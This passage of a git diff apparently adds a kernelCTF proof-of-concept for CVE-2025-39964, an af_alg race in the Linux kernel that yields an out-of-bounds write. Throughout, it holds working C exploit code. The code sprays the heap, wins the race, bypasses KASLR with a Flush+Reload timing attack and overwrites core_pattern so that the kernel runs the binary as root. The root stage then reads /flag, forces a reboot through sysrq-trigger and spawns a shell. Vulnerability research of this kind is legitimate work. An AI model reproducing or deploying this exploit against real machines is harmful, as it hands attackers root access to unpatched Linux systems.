/* AES in CBC mode */ + }; + + /* Step 2: create and bind the AF_ALG transformation socket */ + tfmfd = socket(AF_ALG, 
SOCK_SEQPACKET, 0); + if (tfmfd == -1) { + perror("socket"); + return 1; + } + + if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) { + perror("bind"); + close(tfmfd); + return 1; + } + + unsigned char key[32] = {0}; + if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) { + perror("setsockopt"); + close(tfmfd); + return 1; + } + + opfd = accept(tfmfd, NULL, 0); + if (opfd == -1) { + perror("accept"); + close(tfmfd); + return 1; + } + + int val = 0x1000; + + struct { + struct cmsghdr cmsg; + __u32 op; + __u32 ivlen; + unsigned char iv[16]; + } __attribute__((__packed__)) msg; + + memset(&msg, 0, sizeof(msg)); + msg.cmsg.cmsg_level = SOL_ALG; + msg.cmsg.cmsg_type = ALG_SET_OP; + msg.cmsg.cmsg_len = CMSG_LEN(sizeof(__u32) + sizeof(__u32) + 16); + + msg.op = ALG_OP_ENCRYPT; + msg.ivlen = 16; + memset(msg.iv, 0x01, 16); + + struct iovec iov = { + .iov_base = buf, + .iov_len = 0x1000, + }; + + struct msghdr msgh; + memset(&msgh, 0, sizeof(msgh)); + msgh.msg_iov = &iov; + msgh.msg_iovlen = 1; + msgh.msg_control = &msg; + msgh.msg_controllen = msg.cmsg.cmsg_len; + + /* Step 3: initial sendmsg to initialise the tsgl; advances sgl->cur to 1 */ + ssize_t n = sendmsg(opfd, &msgh, MSG_MORE); + printf("init %ld\n", n); + + /* + * Step 3 (cont): advance sgl->cur from 1 to 124 (MAX_SGL_ENTS - 2) using + * SGL_MERGE_ITERATIONS = 0x7b send+recv pairs. Each send allocates one sg + * entry (cur++); each recv drains the processed entry so the socket stays + * writable. The loop comment in the original PR is: + * "the loop with 0x7b + the sendmsg and send calls executes 125 times, + * matching MAX_SGL_ENTS - 1 = 126 - 1 = 125." 
+ */ + for (int i = 0; i < SGL_MERGE_ITERATIONS; i++) { + SYSCHK(send(opfd, buf, 0x1000, MSG_MORE)); + n = recv(opfd, buf, 0x1000, 0); + } + + /* Advance sgl->cur to 125 = MAX_SGL_ENTS - 1 (one slot before the list is + * full) */ + send(opfd, buf, 0x1000, MSG_MORE); + SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val))); + printf("setsockopt done\n"); + + /* + * Step 3 (race): fork two children that race each other: + * + * Child A (send invalid addr): passes INVALID_USER_ADDR, which causes + * af_alg_alloc_tsgl() to allocate a new tsgl (sgl->cur → 0) then fail + * in memcpy_from_msg() — leaving ctx->merge = 1 and sgl->cur = 0. + * + * Child B (send 0x200 bytes): sends a sub-page-size buffer so that + * ctx->merge is set to 1 and sgl->cur advances to MAX_SGL_ENTS = 126. + * + * Desired outcome: both children finish such that ctx->merge == 1 AND the + * last tsgl has sgl->cur == 0. The next send() will then use sg[-1]. + */ + if (fork() == 0) { + /* Child A: trigger new-tsgl allocation then fail — sets sgl->cur = 0 */ + int x = send(opfd, INVALID_USER_ADDR, 0x400, MSG_MORE); + printf("send3 %d\n", x); + exit(0); + } + + if (fork() == 0) { + /* Child B: sub-page send sets ctx->merge = 1 and fills sgl->cur to + * MAX_SGL_ENTS */ + int x = send(opfd, buf, 0x200, MSG_MORE); + printf("send2 %d\n", x); + exit(0); + } + + /* + * @sleep(desc="wait for both fork children to reach their send() calls and + * set ctx->merge=1 with sgl->cur=0 before we recv()") + */ + sleep(1); + n = recv(opfd, buf, 0x1000, 0); + printf("recv2 %ld\n", n); + wait(NULL); + + /* Step 4: release spray threads so they re-send their crafted payloads */ + for (int i = 0; i < THREAD_NUM; i++) { + write(cfd[1], buf, 1); + } + + n = recv(opfd, buf, 0x1000, 0); + printf("recv2 %ld\n", n); + + memset(buf, 'z', 0x1000); + wait(NULL); + + /* Step 5: map userspace oracle region for the binary search */ + allocate_map(); + + /* Step 5 (OOB trigger): with ctx->merge=1 and sgl->cur=0 this send uses 
+ * sg[-1].page_link from our sprayed payload — triggering the OOB write. + * The check below treats a return of 1 as a lost race ("Race fail") and exits; + * any other return value lets the search continue. + */ + int x = send(opfd, buf, 1, MSG_MORE); + + if (x == 1) { + puts("Race fail"); + exit(0); + } + + /* + * Step 5 (binary search oracle): + * + * Background: + * sg[-1].page_link is effectively a pointer to a struct page in vmemmap. + * The kernel computes the write destination as: + * dest = page_address(sg_page(sg)) + sg->offset + sg->length + * = page_offset_base + (page_link - vmemmap_base) / 64 * PAGE_SIZE + * + offset + length + * With page_link ≈ 0, the pfn arithmetic wraps to a very large value, and + * (page_offset_base + pfn * PAGE_SIZE) wraps further to land within our + * userspace oracle region [SCAN_START_ADDR, SCAN_END_ADDR). + * + * Oracle: + * send() returns 1 → the write destination is in a mapped page (success). + * send() returns -1 → the destination is unmapped (copy_from_user failed). + * By progressively munmap-ing halves of the oracle region we can determine + * which physical page corresponds to the OOB write target. + * + * Binary search (8 iterations → narrows range from SCAN_END_ADDR to + * SCAN_END_ADDR >> 8, i.e. ~320 GiB): + * Each iteration j tests: "if I decrease page_link by half_range/64, does + * the write still succeed?" + * - Decreasing page_link by Δ shifts dest by Δ*64 bytes (since each + * struct-page unit = 64 bytes = one PAGE_SIZE/64 step in physmap).
+ * - The test delta (SCAN_END_ADDR >> (7+j)) in page_link units equals + * half_range = (SCAN_END_ADDR >> (1+j)) in dest-address units. + * If the shifted oracle still succeeds → dest is in the *upper* half → + * unmap the lower half and advance start. + * Otherwise → dest is in the *lower* half → unmap the upper half. + */ + size_t oracle; + size_t leak_offset = 0; + int xcnt = 0; + for (int k = 0; k < MAX_SCAN_ITERATIONS; k++) { + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] -= (SCAN_END_ADDR >> 6); + write(cfd[1], buf, 0x100); + buf[0] = 'a'; + x = send(opfd, buf, 1, MSG_MORE); + if (x == 1) { + puts(""); + xcnt++; + oracle = *(size_t *)&payload[PAYLOAD_OFFS_TARGET]; + char *start = (void *)(0ULL); + for (int j = 0; j < 8; j++) { + printf("loop j: %d\n", j); + x = guess_addr(oracle - (SCAN_END_ADDR >> (7 + j))); + if (x == 1) { + xcnt++; + start += (SCAN_END_ADDR >> (1 + j)); /* upper half */ + munmap(start - (SCAN_END_ADDR >> (1 + j)), + (SCAN_END_ADDR >> (1 + j))); + } else { + munmap(start + (SCAN_END_ADDR >> (1 + j)), + (SCAN_END_ADDR >> (1 + j))); + } + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle; + /* search_offset returns the exact userspace VA of the OOB-written page */ + leak_offset = search_offset(start) + xcnt; + printf("leak_offset %zx\n", leak_offset); + printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]); + + break; + } + } + + if (leak_offset == 0) + exit(0); + + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle; + write(cfd[1], buf, 0x100); + + /* + * Step 6: redirect the OOB write to core_pattern. + * + * leak_offset is the VA of the currently-targeted physical page. + * core_pattern is the KASLR-adjusted kernel VA of core_pattern[]. 
+ * + * First, align within-page: send adjust_offset bytes so that after the + * advance the write starts at the same within-page offset as core_pattern. + */ + size_t adjust_offset = + PAGE_SIZE + (core_pattern & PAGE_MASK) - (leak_offset & PAGE_MASK); + leak_offset += adjust_offset; + + memset(buf, 'z', 0x1000); + SYSCHK(send(opfd, buf, adjust_offset - 1, MSG_MORE)); + SYSCHK(send(opfd, buf, 1, MSG_MORE)); + + printf("sg->len overflow check %x\n", *(char *)(leak_offset - 1)); + if (*(char *)(leak_offset - 1) != 'z') + leak_offset -= 0x100000000ULL; + + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + + /* + * Now adjust payload[PAYLOAD_OFFS_TARGET] (= sg[-1].page_link) so that + * page_address(sg_page(sg)) points to the physical page holding core_pattern. + * The >> 6 (or / 64) is actually a simplification of the formula + * (addr / 0x1000) * 64. We divide the address by 0x1000 to find the page + * index, and then multiply by 64 because each memory page has a page_struct + * that is exactly 64 bytes long. + * payload[PAYLOAD_OFFS_TARGET] is sg[-1].page_link, which controls dest via + * the formula described in the binary search comment above. 
+ */ + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] += + (((core_pattern & ~PAGE_MASK) - (leak_offset & ~PAGE_MASK)) >> 6); + printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]); + write(cfd[1], buf, 0x100); + /* Step 6 (write): send the core_pattern string; kernel copies it to + * core_pattern[] */ + char mcore[64] = "|/proc/%P/fd/666 %P"; + SYSCHK(send(opfd, mcore, 64, MSG_MORE)); + PAUSE; + + return 0; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d << 32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d << 32) | a; + return a; +} + +void prefetch(void *p) { + asm volatile("prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : + : "r"(p)); +} + +size_t flushandreload(void *addr) /* row miss */ +{ + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +/* + * KASLR bypass via Flush+Reload side channel. + * + * Uncomment KASLR_BYPASS_INTEL for Intel CPUs (kernelCTF remote instances). + * Keep commented for GitHub CI (AMD/other) to use the sliding-window variant. + * Alternatively pass -DKASLR_BYPASS_INTEL to the compiler without touching + * source. 
+ */ +// #define KASLR_BYPASS_INTEL +/* + * Returns base unchanged when it is non-zero. Otherwise times prefetches of + * candidate kernel-text addresses (flushandreload), picks one candidate per + * trial, and returns the candidate that wins a strict majority of trials, + * retrying until one does. + */ +size_t bypass_kaslr(u64 base) { + if (!base) { +#ifdef KASLR_BYPASS_INTEL +#define OFFSET 0 +#define START (0xffffffff81000000ull + OFFSET) +#define END (0xffffffffD0000000ull + OFFSET) +#define STEP 0x0000000001000000ull + while (1) { + u64 bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + /* signed so the "nothing found" check below can actually fire */ + int mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + bases[vote] = addrs[mini]; + } + + /* Boyer-Moore majority vote: a newly adopted candidate starts with one + * vote, otherwise the counter never leaves 0 and the last trial always + * wins */ + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + c = 1; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + /* confirm the candidate really holds a strict majority */ + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + base -= OFFSET; + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#else +#define START (0xffffffff81000000ull) +#define END (0xffffffffc0000000ull) +#define STEP 0x0000000000200000ull +#define NUM_TRIALS 9 +/* largest contiguous mapped area at the beginning of _stext */ +#define WINDOW_SIZE 11 + + while (1) { + u64 bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti 
< ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) { + sum += times[ti + i]; + } + if (sum > max) { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + /* Boyer-Moore majority vote: a newly adopted candidate starts with one + * vote, otherwise the counter never leaves 0 and the last trial always + * wins */ + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + c = 1; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + /* confirm the candidate really holds a strict majority */ + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#endif + } + +got_base: + + printf("using kernel base %llx\n", base); + + return base; +} diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/Makefile b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/Makefile new file mode 100644 index 000000000..3eabaca61 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/Makefile @@ -0,0 +1,5 @@ +all: exploit + +exploit: exploit.c + gcc -static-pie -o exploit exploit.c + diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit new file mode 100755 index 000000000..a06f17248 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit.c b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit.c new file mode 100644 index 000000000..3c109bbd3 --- 
/dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit.c @@ -0,0 +1,893 @@ +/* + * Exploit for CVE-2025-39964 — Linux af_alg out-of-bounds write + * (mitigation-v4-6.6) + * + * Vulnerability: af_alg_sendmsg() has a race condition allowing two concurrent + * sendmsg calls to produce ctx->merge=1 with sgl->cur=0 simultaneously. + * In this state the merge branch computes sg = sgl->sg + sgl->cur - 1 = sg[-1], + * which is an out-of-bounds read into the previous heap chunk. The + * sg[-1].page_link value from the previous chunk controls the destination of + * memcpy_from_msg(), giving an arbitrary kernel write primitive. + * + * Exploit chain (mitigation-v4-6.6): + * 1. Spray 0x100 AF_UNIX socket pairs; each thread sends a crafted msghdr + * whose msg_control (payload[]) lands in the heap slot just before an + * af_alg_tsgl. payload[PAYLOAD_OFFS_TARGET] controls sg[-1].page_link = write + * destination. + * 2. Set up an AF_ALG socket (AES-CBC); advance sgl->cur to MAX_SGL_ENTS-1 = + * 125 using 1 sendmsg + SGL_MERGE_ITERATIONS send/recv pairs + 1 more send. + * 3. Fork two children that race: one sets ctx->merge=1 + * (sgl->cur→MAX_SGL_ENTS), the other allocates a new sgl (sgl->cur→0) via an + * invalid userspace pointer. + * 4. With ctx->merge=1 and sgl->cur=0, the next sendmsg triggers the OOB write + * to the address derived from payload[PAYLOAD_OFFS_TARGET]. + * 5. Map [SCAN_START_ADDR, SCAN_END_ADDR) in MAP_CHUNK_SIZE (2 GB) chunks so + * the OOB write destination (which wraps into userspace due to page_link + * arithmetic) falls in a mapped region. An 8-step binary search (oracle = + * send() return value) narrows the target to a SCAN_END_ADDR >> 8 + * (0x5000000000 bytes, 320 GiB) window; mincore then + * locates the exact page. + * 6. Adjust the write destination via page_link arithmetic to point to the + * core_pattern kernel symbol, then write "|/proc/%P/fd/666 %P". + * 7. 
A forked child watches for core_pattern to change, then faults (NULL + * deref), causing the kernel to execute our binary as root via core_pattern. + * 8. Re-exec reads /flag via pidfd_getfd() on the parent's stdio descriptors. + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#ifndef SYS_pidfd_getfd +#define SYS_pidfd_getfd 438 +#endif + +#ifndef SYS_pidfd_open +#define SYS_pidfd_open 434 +#endif + +size_t vmemmap_base = 0xffffea0000000000ULL; +size_t page_offset_base = 0xffff888000000000ULL; +size_t core_pattern = 0xffffffff8420d520ULL; + +/* Socket options */ +#define ALG_SET_KEY 1 +#define ALG_SET_IV 2 +#define ALG_SET_OP 3 +#define ALG_SET_AEAD_ASSOCLEN 4 +#define ALG_SET_AEAD_AUTHSIZE 5 +#define ALG_SET_DRBG_ENTROPY 6 +#define ALG_SET_KEY_BY_KEY_SERIAL 7 + +/* Operations */ +#define ALG_OP_DECRYPT 0 +#define ALG_OP_ENCRYPT 1 + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +#define __u32 uint32_t +#define __u16 uint16_t +#define __u8 uint8_t +#define PAUSE \ + { \ + int x; \ + printf(":"); \ + read(0, &x, 1); \ + } + +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ + }) + +#ifndef SYS_process_vm_readv +#define SYS_process_vm_readv 310 +#endif + +/* Number of AF_UNIX pairs to spray; one pair per exploit thread */ +#define THREAD_NUM 0x100 + +/* + * Size of each private anonymous mapping used as the OOB write oracle region: + * 512 PTEs per page * PAGE_SIZE = 2 MB physical coverage per mmap entry. + */ +#define MMAP_REGION_LEN (0x1000 / 8 * 0x1000) + +/* + * Start of the contiguous userspace region we map for the binary-search oracle. 
+ * We start just above the 4 GB boundary to avoid the low userspace region. + */ +#define SCAN_START_ADDR 0x100000000ULL + +/* Maximum number of mincore windows tried during the page-address scan */ +#define MAX_SCAN_ITERATIONS 0x50 + +/* + * Unmapped address passed as invalid user pointer to trigger the race + * condition: the first 4 MB of virtual address space (0–0xfff000) is always + * unmapped. + */ +#define INVALID_USER_ADDR ((void *)0xfff000) + +/* + * Byte offset of sg[-1].page_link inside the sprayed msg_control payload: + * af_alg_tsgl is allocated in a 4096-byte slab object. + * sgl->sg[0] starts at byte 24 (sizeof(af_alg_tsgl)). + * sg[-1] = sgl->sg[-1] lies 32 bytes (sizeof(scatterlist)) before sg[0], + * i.e. at byte 24 - 32 = -8 relative to the tsgl object start. + * In the *previous* 4096-byte heap object that is offset 4096 - 8 = 0xff8. + * scatterlist.page_link is the first field (offset 0), so payload[0xff8] + * directly controls the page_link that the OOB write uses as its destination. + */ +#define PAYLOAD_OFFS_TARGET 0xff8 + +/* + * Number of send/recv iterations to advance sgl->cur from 1 to 124 + * (MAX_SGL_ENTS-2). MAX_SGL_ENTS = (4096 - sizeof(af_alg_tsgl)) / + * sizeof(scatterlist) - 1 = (4096 - 24) / 32 - 1 = 126. One initial sendmsg + * sets cur=1; SGL_MERGE_ITERATIONS send+recv pairs bring it to 1 + 0x7b = 124; + * one more send brings it to 125 = MAX_SGL_ENTS - 1. + */ +#define SGL_MERGE_ITERATIONS 0x7b + +/* Compile-time unslid base of kernel text (_stext); used when computing symbol + * offsets */ +#define KERNEL_TEXT_BASE 0xffffffff81000000UL + +/* + * KASLR-invariant offset of core_pattern from _stext in mitigation-v4-6.6. + * core_pattern is at 0xffffffff83db3720; _stext is at KERNEL_TEXT_BASE. + */ +#define CORE_PATTERN_MIT_OFFSET (0xffffffff83db3720UL - KERNEL_TEXT_BASE) + +/* + * The mitigation kernel's physmap base is shifted up by 4 GB relative to + * LTS/COS. 
This additional page_link adjustment (4 GB / 64 = 0x4000000) + * is applied statically rather than via a runtime environment variable. + */ +#define MITIGATION_PHYSMAP_EXTRA_OFFSET (0x100000000ULL >> 6) + +/* Upper bound of the userspace oracle scan region [SCAN_START_ADDR, + * SCAN_END_ADDR) */ +#define SCAN_END_ADDR 0x500000000000ULL + +/* Size of each anonymous 2 GB mmap chunk used to cover the oracle region */ +#define MAP_CHUNK_SIZE 0x80000000ULL + +#ifndef PAGE_SIZE +#define PAGE_SIZE 0x1000 +#endif +/* Page offset mask for within-page alignment (PAGE_SIZE - 1) */ +#define PAGE_MASK (PAGE_SIZE - 1) + +pthread_t tid[THREAD_NUM]; + +/* Shared scratch buffer used by spray threads and the main exploit loop */ +char buf[0x10000]; +char vec[0x100000]; + +int cfd[2]; +int sfd[THREAD_NUM][2]; +char payload[0x1000]; +int opfd; + +struct sockaddr_alg { + __u16 salg_family; + __u8 salg_type[14]; + __u32 salg_feat; + __u32 salg_mask; + __u8 salg_name[64]; +}; + +void set_cpu(int i) { + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(i, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} + +void *spray_send_thread(void *x) { + size_t idx = (size_t)x; + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + struct iovec iov = {buf, 0x1000}; + struct msghdr mhdr = {.msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = payload, + .msg_controllen = 0x1000}; + while (1) { + sendmsg(sfd[idx][1], &mhdr, 0); + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + } +} + +/* + * Step 1: Spray THREAD_NUM AF_UNIX socket pairs, each sending a crafted msghdr + * whose msg_control buffer (payload[]) will occupy the heap slot immediately + * preceding an af_alg_tsgl allocation. payload[PAYLOAD_OFFS_TARGET] then + * aliases sg[-1].page_link and controls the OOB write destination. 
+ */ +void spray_unix_sockets() { + memset(payload, 'a', 0x1000); + struct cmsghdr *first; + first = (struct cmsghdr *)payload; + first->cmsg_len = 0x1000; + first->cmsg_level = + 0; /* must differ from SOL_SOCKET=1 to skip cmsg processing */ + first->cmsg_type = 0x41414141; /* dummy filler value */ + /* Initially zero; the binary search will update this to guide the OOB write + */ + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = 0; + + for (int i = 0; i < THREAD_NUM; i++) { + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i])); + int n = 0x800; + setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n)); + setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n)); + write(sfd[i][1], buf, 0x1000); + } + + for (int i = 0; i < THREAD_NUM; i++) + pthread_create(&tid[i], 0, spray_send_thread, (void *)(size_t)i); + + for (int i = 0; i < THREAD_NUM; i++) + read(cfd[1], buf, 1); +} + +/* + * Step 5a: Map the full userspace range [SCAN_START_ADDR, SCAN_END_ADDR) with + * physical pages in MAP_CHUNK_SIZE (2 GB) chunks. When sg[-1].page_link is + * crafted with a value near 0, the kernel's page_address() computation wraps + * around and the OOB write destination lands somewhere within this region. + * Mapping real pages here means the write silently succeeds (our oracle), + * letting us binary-search for the exact physical page by progressively + * munmap-ing halves of this range. + */ +void allocate_map() { + char *start = (void *)SCAN_START_ADDR; + while (1) { + start = SYSCHK(mmap(start, MAP_CHUNK_SIZE, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANON | MAP_FIXED, -1, 0)); + start += MAP_CHUNK_SIZE; + if ((size_t)start >= SCAN_END_ADDR) + break; + } +} + +/* + * Step 5b: Use mincore to find the exact virtual address in [start, start+4GB) + * that corresponds to the physical page the OOB write targets. 
A page marked + * resident (mincore bit = 1) that also contains our spray marker ('a') is the + * hit: it is the page that the kernel's arbitrary-write wrote into. + */ +size_t search_offset(char *start) { + char *pvec = NULL; + for (int i = 0; i < MAX_SCAN_ITERATIONS; i++) { + mincore((void *)start, 0x100000000ULL, vec); + pvec = memchr(vec, 1, 0x100000); + if (pvec) { + char *leak_offset = start + (pvec - vec) * 0x1000; + pvec = memchr((void *)leak_offset, 'a', 0x1000); + if (pvec) + break; + } + start += 0x100000000ULL; + } + if (pvec == NULL) + exit(0); + printf("\npvec %p %x\n", pvec, pvec[0]); + return (size_t)pvec; +} + +int check_core() { + /* Check if /proc/sys/kernel/core_pattern has been overwritten */ + char core_pattern_buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, core_pattern_buf, sizeof(core_pattern_buf)); + close(core); + return strncmp(core_pattern_buf, "|/proc/%P/fd/666", 0x10) == 0; +} + +void crash(char *cmd) { + int memfd = memfd_create("", 0); + /* send our binary to memfd for core_pattern payload */ + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); + /* our binary now at file descriptor 666 */ + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + puts("Root shell !!"); + /* Trigger program crash and cause kernel to execute program from core_pattern + * which is our "root" binary */ + *(size_t *)0 = 0; +} + +size_t bypass_kaslr(u64 base); + +int guess_addr(size_t guesss) { + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = guesss; + write(cfd[1], buf, 0x100); + buf[0] = 'b'; + int x = send(opfd, buf, 1, MSG_MORE); + printf("x: %d\n", x); + return x == 1; +} + +int trigger_exploit(); +int main(int argc, char **argv) { + + setvbuf(stdin, 0, 2, 0); + setvbuf(stdout, 0, 2, 0); + puts("Exploit start"); + if (argc == 1) { + size_t stext = 0; + if (getenv("KTEXT")) + 
stext = strtoull(getenv("KTEXT"), 0, 16); + else + stext = bypass_kaslr(0); + /* core_pattern symbol is at a fixed offset from _stext */ + core_pattern = stext + CORE_PATTERN_MIT_OFFSET; + printf("got stext 0x%zx 0x%zx\n", stext, core_pattern); + } + + struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000}; + setrlimit(RLIMIT_NOFILE, &rlim); + + if (argc > 1) { +#define SYS_pidfd_getfd 438 + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Run cat /flag multiple times to ensure output is flushed before reboot */ + for (int i = 0; i < 6; i++) + system("cat /flag"); + + system("cat /flag;echo o>/proc/sysrq-trigger"); + execlp("bash", "bash", NULL); + } + /* Step 7: fork a watcher that polls core_pattern and triggers crash once + * overwritten */ + if (fork() == 0) { + set_cpu(0); + setsid(); + crash(""); + } + /* Retry loop: trigger_exploit() may fail the race; restart on failure */ + while (1) { + if (fork() == 0) { + trigger_exploit(); + exit(0); + } + wait(NULL); + } +} + +int trigger_exploit() { + int tfmfd; + + set_cpu(1); + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd)); + + /* Step 1: spray heap with crafted msg_control buffers */ + spray_unix_sockets(); + + char *addr = SYSCHK(mmap(0, MMAP_REGION_LEN, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON, -1, 0)); + struct iovec local = {.iov_base = addr, .iov_len = MMAP_REGION_LEN}; + struct iovec remote = {.iov_base = addr, .iov_len = MMAP_REGION_LEN}; + + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "skcipher", /* symmetric key cipher */ + .salg_name = "cbc(aes)", /* AES in CBC mode */ + }; + + /* Step 2: create and bind the AF_ALG transformation socket */ + tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (tfmfd == -1) { + 
